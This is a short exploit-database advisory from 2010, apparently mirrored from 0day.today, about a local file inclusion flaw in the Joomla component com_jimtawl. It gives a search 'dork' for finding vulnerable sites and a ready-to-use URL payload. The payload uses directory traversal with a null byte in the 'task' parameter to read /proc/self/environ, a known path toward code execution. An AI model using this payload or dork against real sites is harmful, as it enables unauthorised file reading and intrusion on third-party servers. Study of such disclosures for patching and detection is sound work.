id: 14918
date: 11/21/2010
title: Joomla Component com_jimtawl Local File Inclusion Vulnerability
author: Mask_magicianz
cves: 

===============================================================
Joomla Component com_jimtawl Local File Inclusion Vulnerability
===============================================================

Author      : Mask_magicianz
Date        : November, 20/2010
Location    : Medan, Indonesia
Time Zone   : GMT +7:00
Application : Package Jimtawl
Dork         : com_jimtawl
Contact     : Mask_magicianz[at]yahoo[dot]com
http://extensions.joomla.org/extensions/multimedia/streaming-a-broadcasting/audio-broadcasting/4344
_______________________________________________________________________
 
http://127.0.0.1/index.php?option=com_jimtawl&Itemid=12&task=[LFI]
http://127.0.0.1/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00



#  0day.today [2023-03-24]  #